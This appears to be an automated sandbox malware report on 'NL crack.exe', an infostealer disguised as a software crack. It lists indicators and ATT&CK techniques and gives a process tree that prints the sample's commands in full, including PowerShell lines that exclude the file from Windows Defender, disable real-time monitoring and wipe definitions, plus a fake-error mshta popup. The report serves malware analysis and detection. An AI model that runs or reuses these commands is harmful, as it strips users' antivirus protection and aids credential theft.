42d0ac58a55e49f367e482622fd3217d0bfe61aa0e4990667b64ab85723c34b0

Analysis

max time kernel
60s
max time network
62s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
19-01-2025 10:53

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

NL crack.exe
Size

7.4MB
MD5

96d9331c952712cc7ffdc039e7660caa
SHA1

2f80b30bce6aff706c1543e0139ec47228c5d05c
SHA256

42d0ac58a55e49f367e482622fd3217d0bfe61aa0e4990667b64ab85723c34b0
SHA512

7d86cabe594dc84316b203304f016bbf470fd016da061e01217f4445d10a38cf071d1d3173fe6c04e82ba59770f5a570b27c52bfa74352d0b93b307d7a531422
SSDEEP

98304:7cHMcHurErvz81LpWjjUlLkvzgXO9hAlaYrzzuJZYJ1JIuI5KU78bcgPowXRhu:7GurErvI9pWjgyvoaYrE41JIuIwoOdhu

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
464	powershell.exe
1896	powershell.exe
1748	powershell.exe
4612	powershell.exe
4648	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	NL crack.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
4788	cmd.exe
2020	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
2084	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
4868	NL crack.exe
4868	NL crack.exe
4868	NL crack.exe
4868	NL crack.exe
4868	NL crack.exe
4868	NL crack.exe
4868	NL crack.exe
4868	NL crack.exe
4868	NL crack.exe
4868	NL crack.exe
4868	NL crack.exe
4868	NL crack.exe
4868	NL crack.exe
4868	NL crack.exe
4868	NL crack.exe
4868	NL crack.exe
4868	NL crack.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
30	discord.com
31	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
19	ip-api.com
28	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
368	tasklist.exe
4576	tasklist.exe
844	tasklist.exe
3156	tasklist.exe
3884	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
2556	cmd.exe

UPX packed file 59 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000a000000023b94-21.dat	upx
behavioral1/memory/4868-25-0x00007FFDC44F0000-0x00007FFDC4AE0000-memory.dmp	upx
behavioral1/files/0x000a000000023b87-27.dat	upx
behavioral1/files/0x000a000000023b92-29.dat	upx
behavioral1/memory/4868-30-0x00007FFDD7210000-0x00007FFDD7234000-memory.dmp	upx
behavioral1/files/0x000a000000023b8e-48.dat	upx
behavioral1/files/0x000a000000023b8d-47.dat	upx
behavioral1/files/0x000a000000023b8c-46.dat	upx
behavioral1/files/0x000a000000023b8b-45.dat	upx
behavioral1/files/0x000a000000023b8a-44.dat	upx
behavioral1/files/0x000a000000023b89-43.dat	upx
behavioral1/files/0x000a000000023b88-42.dat	upx
behavioral1/files/0x000a000000023b86-41.dat	upx
behavioral1/files/0x000a000000023b99-40.dat	upx
behavioral1/files/0x000a000000023b98-39.dat	upx
behavioral1/files/0x000a000000023b97-38.dat	upx
behavioral1/files/0x000a000000023b93-35.dat	upx
behavioral1/files/0x000a000000023b91-34.dat	upx
behavioral1/memory/4868-32-0x00007FFDDCB80000-0x00007FFDDCB8F000-memory.dmp	upx
behavioral1/memory/4868-54-0x00007FFDD3CF0000-0x00007FFDD3D1D000-memory.dmp	upx
behavioral1/memory/4868-56-0x00007FFDD3FD0000-0x00007FFDD3FE9000-memory.dmp	upx
behavioral1/memory/4868-58-0x00007FFDD3CC0000-0x00007FFDD3CE3000-memory.dmp	upx
behavioral1/memory/4868-60-0x00007FFDC4040000-0x00007FFDC41B6000-memory.dmp	upx
behavioral1/memory/4868-64-0x00007FFDD3F40000-0x00007FFDD3F4D000-memory.dmp	upx
behavioral1/memory/4868-63-0x00007FFDD3B30000-0x00007FFDD3B49000-memory.dmp	upx
behavioral1/memory/4868-66-0x00007FFDC44F0000-0x00007FFDC4AE0000-memory.dmp	upx
behavioral1/memory/4868-67-0x00007FFDD39F0000-0x00007FFDD3A23000-memory.dmp	upx
behavioral1/memory/4868-74-0x00007FFDD7210000-0x00007FFDD7234000-memory.dmp	upx
behavioral1/memory/4868-72-0x00007FFDC3720000-0x00007FFDC3C49000-memory.dmp	upx
behavioral1/memory/4868-71-0x00007FFDD3240000-0x00007FFDD330D000-memory.dmp	upx
behavioral1/memory/4868-76-0x00007FFDD39D0000-0x00007FFDD39E4000-memory.dmp	upx
behavioral1/memory/4868-79-0x00007FFDD3B20000-0x00007FFDD3B2D000-memory.dmp	upx
behavioral1/memory/4868-78-0x00007FFDD3FD0000-0x00007FFDD3FE9000-memory.dmp	upx
behavioral1/memory/4868-82-0x00007FFDC3600000-0x00007FFDC371C000-memory.dmp	upx
behavioral1/memory/4868-81-0x00007FFDD3CC0000-0x00007FFDD3CE3000-memory.dmp	upx
behavioral1/memory/4868-108-0x00007FFDC4040000-0x00007FFDC41B6000-memory.dmp	upx
behavioral1/memory/4868-109-0x00007FFDD3B30000-0x00007FFDD3B49000-memory.dmp	upx
behavioral1/memory/4868-221-0x00007FFDD39F0000-0x00007FFDD3A23000-memory.dmp	upx
behavioral1/memory/4868-292-0x00007FFDD3240000-0x00007FFDD330D000-memory.dmp	upx
behavioral1/memory/4868-293-0x00007FFDC3720000-0x00007FFDC3C49000-memory.dmp	upx
behavioral1/memory/4868-321-0x00007FFDD7210000-0x00007FFDD7234000-memory.dmp	upx
behavioral1/memory/4868-326-0x00007FFDC4040000-0x00007FFDC41B6000-memory.dmp	upx
behavioral1/memory/4868-320-0x00007FFDC44F0000-0x00007FFDC4AE0000-memory.dmp	upx
behavioral1/memory/4868-372-0x00007FFDC44F0000-0x00007FFDC4AE0000-memory.dmp	upx
behavioral1/memory/4868-387-0x00007FFDC44F0000-0x00007FFDC4AE0000-memory.dmp	upx
behavioral1/memory/4868-400-0x00007FFDD3B20000-0x00007FFDD3B2D000-memory.dmp	upx
behavioral1/memory/4868-409-0x00007FFDD3B30000-0x00007FFDD3B49000-memory.dmp	upx
behavioral1/memory/4868-398-0x00007FFDC3720000-0x00007FFDC3C49000-memory.dmp	upx
behavioral1/memory/4868-408-0x00007FFDC4040000-0x00007FFDC41B6000-memory.dmp	upx
behavioral1/memory/4868-407-0x00007FFDD3CC0000-0x00007FFDD3CE3000-memory.dmp	upx
behavioral1/memory/4868-406-0x00007FFDD3FD0000-0x00007FFDD3FE9000-memory.dmp	upx
behavioral1/memory/4868-405-0x00007FFDD3CF0000-0x00007FFDD3D1D000-memory.dmp	upx
behavioral1/memory/4868-404-0x00007FFDDCB80000-0x00007FFDDCB8F000-memory.dmp	upx
behavioral1/memory/4868-403-0x00007FFDD7210000-0x00007FFDD7234000-memory.dmp	upx
behavioral1/memory/4868-402-0x00007FFDD3F40000-0x00007FFDD3F4D000-memory.dmp	upx
behavioral1/memory/4868-399-0x00007FFDD39D0000-0x00007FFDD39E4000-memory.dmp	upx
behavioral1/memory/4868-397-0x00007FFDD3240000-0x00007FFDD330D000-memory.dmp	upx
behavioral1/memory/4868-396-0x00007FFDD39F0000-0x00007FFDD3A23000-memory.dmp	upx
behavioral1/memory/4868-401-0x00007FFDC3600000-0x00007FFDC371C000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2260	cmd.exe
2480	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
1548	cmd.exe
2788	netsh.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	taskmgr.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2640	WMIC.exe
4924	WMIC.exe
1388	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
3904	systeminfo.exe

Modifies data under HKEY_USERS 15 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "234"	LogonUI.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2480	PING.EXE

Suspicious behavior: EnumeratesProcesses 62 IoCs

pid	Process
1896	powershell.exe
4648	powershell.exe
1896	powershell.exe
4648	powershell.exe
4648	powershell.exe
4612	powershell.exe
4612	powershell.exe
2020	powershell.exe
2020	powershell.exe
3180	powershell.exe
3180	powershell.exe
2020	powershell.exe
3180	powershell.exe
1748	powershell.exe
1748	powershell.exe
4188	powershell.exe
4188	powershell.exe
464	powershell.exe
464	powershell.exe
972	powershell.exe
972	powershell.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	368	tasklist.exe
Token: SeIncreaseQuotaPrivilege	4252	WMIC.exe
Token: SeSecurityPrivilege	4252	WMIC.exe
Token: SeTakeOwnershipPrivilege	4252	WMIC.exe
Token: SeLoadDriverPrivilege	4252	WMIC.exe
Token: SeSystemProfilePrivilege	4252	WMIC.exe
Token: SeSystemtimePrivilege	4252	WMIC.exe
Token: SeProfSingleProcessPrivilege	4252	WMIC.exe
Token: SeIncBasePriorityPrivilege	4252	WMIC.exe
Token: SeCreatePagefilePrivilege	4252	WMIC.exe
Token: SeBackupPrivilege	4252	WMIC.exe
Token: SeRestorePrivilege	4252	WMIC.exe
Token: SeShutdownPrivilege	4252	WMIC.exe
Token: SeDebugPrivilege	4252	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4252	WMIC.exe
Token: SeRemoteShutdownPrivilege	4252	WMIC.exe
Token: SeUndockPrivilege	4252	WMIC.exe
Token: SeManageVolumePrivilege	4252	WMIC.exe
Token: 33	4252	WMIC.exe
Token: 34	4252	WMIC.exe
Token: 35	4252	WMIC.exe
Token: 36	4252	WMIC.exe
Token: SeDebugPrivilege	1896	powershell.exe
Token: SeDebugPrivilege	4648	powershell.exe
Token: SeIncreaseQuotaPrivilege	4252	WMIC.exe
Token: SeSecurityPrivilege	4252	WMIC.exe
Token: SeTakeOwnershipPrivilege	4252	WMIC.exe
Token: SeLoadDriverPrivilege	4252	WMIC.exe
Token: SeSystemProfilePrivilege	4252	WMIC.exe
Token: SeSystemtimePrivilege	4252	WMIC.exe
Token: SeProfSingleProcessPrivilege	4252	WMIC.exe
Token: SeIncBasePriorityPrivilege	4252	WMIC.exe
Token: SeCreatePagefilePrivilege	4252	WMIC.exe
Token: SeBackupPrivilege	4252	WMIC.exe
Token: SeRestorePrivilege	4252	WMIC.exe
Token: SeShutdownPrivilege	4252	WMIC.exe
Token: SeDebugPrivilege	4252	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4252	WMIC.exe
Token: SeRemoteShutdownPrivilege	4252	WMIC.exe
Token: SeUndockPrivilege	4252	WMIC.exe
Token: SeManageVolumePrivilege	4252	WMIC.exe
Token: 33	4252	WMIC.exe
Token: 34	4252	WMIC.exe
Token: 35	4252	WMIC.exe
Token: 36	4252	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4924	WMIC.exe
Token: SeSecurityPrivilege	4924	WMIC.exe
Token: SeTakeOwnershipPrivilege	4924	WMIC.exe
Token: SeLoadDriverPrivilege	4924	WMIC.exe
Token: SeSystemProfilePrivilege	4924	WMIC.exe
Token: SeSystemtimePrivilege	4924	WMIC.exe
Token: SeProfSingleProcessPrivilege	4924	WMIC.exe
Token: SeIncBasePriorityPrivilege	4924	WMIC.exe
Token: SeCreatePagefilePrivilege	4924	WMIC.exe
Token: SeBackupPrivilege	4924	WMIC.exe
Token: SeRestorePrivilege	4924	WMIC.exe
Token: SeShutdownPrivilege	4924	WMIC.exe
Token: SeDebugPrivilege	4924	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4924	WMIC.exe
Token: SeRemoteShutdownPrivilege	4924	WMIC.exe
Token: SeUndockPrivilege	4924	WMIC.exe
Token: SeManageVolumePrivilege	4924	WMIC.exe
Token: 33	4924	WMIC.exe
Token: 34	4924	WMIC.exe

Suspicious use of FindShellTrayWindow 63 IoCs

pid	Process
4816	mshta.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe

Suspicious use of SendNotifyMessage 62 IoCs

pid	Process
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe
4800	taskmgr.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
5080	LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4820 wrote to memory of 4868	4820	NL crack.exe	84
PID 4820 wrote to memory of 4868	4820	NL crack.exe	84
PID 4868 wrote to memory of 3996	4868	NL crack.exe	85
PID 4868 wrote to memory of 3996	4868	NL crack.exe	85
PID 4868 wrote to memory of 1792	4868	NL crack.exe	86
PID 4868 wrote to memory of 1792	4868	NL crack.exe	86
PID 4868 wrote to memory of 3644	4868	NL crack.exe	87
PID 4868 wrote to memory of 3644	4868	NL crack.exe	87
PID 4868 wrote to memory of 4884	4868	NL crack.exe	90
PID 4868 wrote to memory of 4884	4868	NL crack.exe	90
PID 4868 wrote to memory of 1972	4868	NL crack.exe	93
PID 4868 wrote to memory of 1972	4868	NL crack.exe	93
PID 1792 wrote to memory of 1896	1792	cmd.exe	95
PID 1792 wrote to memory of 1896	1792	cmd.exe	95
PID 4884 wrote to memory of 368	4884	cmd.exe	96
PID 4884 wrote to memory of 368	4884	cmd.exe	96
PID 1972 wrote to memory of 4252	1972	cmd.exe	97
PID 1972 wrote to memory of 4252	1972	cmd.exe	97
PID 3996 wrote to memory of 4648	3996	cmd.exe	98
PID 3996 wrote to memory of 4648	3996	cmd.exe	98
PID 3644 wrote to memory of 4816	3644	cmd.exe	99
PID 3644 wrote to memory of 4816	3644	cmd.exe	99
PID 4868 wrote to memory of 4744	4868	NL crack.exe	101
PID 4868 wrote to memory of 4744	4868	NL crack.exe	101
PID 4744 wrote to memory of 4920	4744	cmd.exe	103
PID 4744 wrote to memory of 4920	4744	cmd.exe	103
PID 4868 wrote to memory of 4320	4868	NL crack.exe	104
PID 4868 wrote to memory of 4320	4868	NL crack.exe	104
PID 4320 wrote to memory of 3156	4320	cmd.exe	106
PID 4320 wrote to memory of 3156	4320	cmd.exe	106
PID 4868 wrote to memory of 2288	4868	NL crack.exe	107
PID 4868 wrote to memory of 2288	4868	NL crack.exe	107
PID 2288 wrote to memory of 4924	2288	cmd.exe	109
PID 2288 wrote to memory of 4924	2288	cmd.exe	109
PID 4868 wrote to memory of 1576	4868	NL crack.exe	110
PID 4868 wrote to memory of 1576	4868	NL crack.exe	110
PID 1576 wrote to memory of 1388	1576	cmd.exe	112
PID 1576 wrote to memory of 1388	1576	cmd.exe	112
PID 4868 wrote to memory of 2556	4868	NL crack.exe	113
PID 4868 wrote to memory of 2556	4868	NL crack.exe	113
PID 4868 wrote to memory of 1888	4868	NL crack.exe	114
PID 4868 wrote to memory of 1888	4868	NL crack.exe	114
PID 2556 wrote to memory of 3204	2556	cmd.exe	117
PID 2556 wrote to memory of 3204	2556	cmd.exe	117
PID 1888 wrote to memory of 4612	1888	cmd.exe	118
PID 1888 wrote to memory of 4612	1888	cmd.exe	118
PID 4868 wrote to memory of 1480	4868	NL crack.exe	119
PID 4868 wrote to memory of 1480	4868	NL crack.exe	119
PID 4868 wrote to memory of 2436	4868	NL crack.exe	120
PID 4868 wrote to memory of 2436	4868	NL crack.exe	120
PID 1480 wrote to memory of 4576	1480	cmd.exe	123
PID 1480 wrote to memory of 4576	1480	cmd.exe	123
PID 2436 wrote to memory of 844	2436	cmd.exe	124
PID 2436 wrote to memory of 844	2436	cmd.exe	124
PID 4868 wrote to memory of 3408	4868	NL crack.exe	125
PID 4868 wrote to memory of 3408	4868	NL crack.exe	125
PID 4868 wrote to memory of 4788	4868	NL crack.exe	127
PID 4868 wrote to memory of 4788	4868	NL crack.exe	127
PID 4868 wrote to memory of 3304	4868	NL crack.exe	128
PID 4868 wrote to memory of 3304	4868	NL crack.exe	128
PID 4868 wrote to memory of 1900	4868	NL crack.exe	165
PID 4868 wrote to memory of 1900	4868	NL crack.exe	165
PID 4868 wrote to memory of 1548	4868	NL crack.exe	132
PID 4868 wrote to memory of 1548	4868	NL crack.exe	132

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2176	attrib.exe
3204	attrib.exe
2492	attrib.exe

C:\Users\Admin\AppData\Local\Temp\NL crack.exe
"C:\Users\Admin\AppData\Local\Temp\NL crack.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4820
- C:\Users\Admin\AppData\Local\Temp\NL crack.exe
  "C:\Users\Admin\AppData\Local\Temp\NL crack.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4868
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\NL crack.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3996
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\NL crack.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4648
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1792
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Sorry, we have a problem, restart your pc!', 0, 'Error', 0+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3644
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Sorry, we have a problem, restart your pc!', 0, 'Error', 0+16);close()"
      4⤵
      Suspicious use of FindShellTrayWindow
      PID:4816
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4884
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:368
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1972
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4252
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4744
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:4920
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4320
  - - C:\Windows\system32\reg.exe
